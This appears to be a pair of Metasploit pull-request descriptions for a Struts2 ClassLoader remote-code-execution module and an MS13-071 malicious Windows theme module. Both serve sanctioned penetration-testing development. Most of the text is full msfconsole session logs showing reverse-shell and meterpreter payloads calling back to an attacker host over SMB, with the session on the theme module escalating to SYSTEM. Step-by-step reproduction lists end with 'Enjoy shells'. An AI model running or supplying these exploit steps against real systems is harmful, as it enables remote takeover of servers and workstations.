Remove checks for specific Tomcat versions, instead checking whether a
stacktrace is returned when requesting
?Class.classLoader.resources.dirContext.cacheObjectMaxSize with invalid
arguments.
Tested against Tomcat 6 and Tomcat 7 with Struts 2.3.16.1
This commit adds an exploit for the Struts2 RCE utilising the Rex
SMBFileServer Protocol support to deploy a JSP shell over SMB.
```
resource (test4.msf)> use exploits/windows/http/struts_http_jspinject
resource (test4.msf)> set VERBOSE true
VERBOSE => true
resource (test4.msf)> set PAYLOAD java/jsp_shell_reverse_tcp
PAYLOAD => java/jsp_shell_reverse_tcp
resource (test4.msf)> set URI /struts2-blank/example/HelloWorld.action
URI => /struts2-blank/example/HelloWorld.action
resource (test4.msf)> set SHARE share
SHARE => share
resource (test4.msf)> set JSP /example/HelloWorld.jsp
JSP => /example/HelloWorld.jsp
resource (test4.msf)> set SRVHOST 172.31.6.41
SRVHOST => 172.31.6.41
resource (test4.msf)> set RHOST 172.31.6.245
RHOST => 172.31.6.245
resource (test4.msf)> set RPORT 8080
RPORT => 8080
resource (test4.msf)> set LHOST 172.31.6.41
LHOST => 172.31.6.41
resource (test4.msf)> set LPORT 4444
LPORT => 4444
resource (test4.msf)> exploit
[*] Started reverse handler on 172.31.6.41:4444
[*] Generating our malicious jsp...
[*] About to start SMB Server on: \\172.31.6.41\share for
/example/HelloWorld.jsp
[*] Starting SMB Server on 172.31.6.41:445
[*] Injecting JSP to 172.31.6.245:8080 -
/struts2-blank/example/HelloWorld.action?Class.classLoader.resources.dirContext.docBase=//172.31.6.41/share
[*] 172.31.6.245:8080 - JSP payload uploaded successfully
[*] Command shell session 1 opened (172.31.6.41:4444 ->
172.31.6.245:1146) at 2014-05-01 12:09:25 +0100
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
C:\Program Files\Apache Software Foundation\apache-tomcat-7.0.53\bin>
```
1. Install Tomcat 7.0.53
2. Download and unpack Struts 2.3.16.1 (http://www.mirrorservice.org/sites/ftp.apache.org//struts/binaries/struts-2.3.16.1-all.zip)
3. Deploy struts-2.3.16.1/apps/struts2-blank.war through Tomcat Manager interface
4. use exploits/windows/http/struts_http_jspinject
5. set PAYLOAD java/jsp_shell_reverse_tcp
6. set URI /struts2-blank/example/HelloWorld.action
7. set SHARE share
8. set JSP /example/HelloWorld.jsp
9. set SRVHOST
10. set RHOST
11. set RPORT 8080
12. set LHOST
13. set LPORT 4444
14. exploit
15. Enjoy shells
- [ ] Land #3074
- [ ] Land #3075
- [ ] Run exploits/windows/http/struts_http_jspinject
Tomcat 7.0.53 & Struts 2.3.16.1
This commit refactors the ms13_071_theme module written by @jvazques-r7
to utilise the Rex SMBFileServer protocol and remove duplicate code from
Metasploit.
```
[*] Processing test3.msf for ERB directives.
resource (test3.msf)> use exploits/windows/fileformat/ms13_071_theme
resource (test3.msf)> set VERBOSE true
VERBOSE => true
resource (test3.msf)> set SHARE share
SHARE => share
resource (test3.msf)> set SCR exploit.scr
SCR => exploit.scr
resource (test3.msf)> set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
resource (test3.msf)> set LHOST 172.32.255.1
LHOST => 172.32.255.1
resource (test3.msf)> set SRVHOST 172.32.255.1
SRVHOST => 172.32.255.1
resource (test3.msf)> set LPORT 4444
LPORT => 4444
resource (test3.msf)> exploit
[*] Started reverse handler on 172.32.255.1:4444
[*] Generating our malicious executable...
[*] Creating 'msf.theme' file ...
[+] msf.theme stored at /root/.msf4/local/msf.theme
[+] Let your victim open msf.theme
[*] Starting SMB Server on: \\172.32.255.1\share\exploit.scr
[*] Starting SMB Server on 172.32.255.1:445
[*] Sending stage (769536 bytes) to 172.32.255.129
[*] Meterpreter session 1 opened (172.32.255.1:4444 -> 172.32.255.129:1096) at 2014-04-30 12:05:46 +0100
meterpreter > getsystem
...got system (via technique 1).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
```
1. use exploits/windows/fileformat/ms13_071_theme
2. set payload windows/meterpreter/reverse_tcp
3. set LHOST
4. set SRVHOST
5. exploit
6. Copy msf.theme to target
7. Open theme and navigate to "Screensaver" tab
8. Enjoy shells
- [ ] Land #3074
- [ ] Land #3075
- [ ] Run exploits/windows/fileformat/ms13_071_theme
- [ ] Let target open malicious msf.theme file
* Windows XP SP3
Tod Beardsley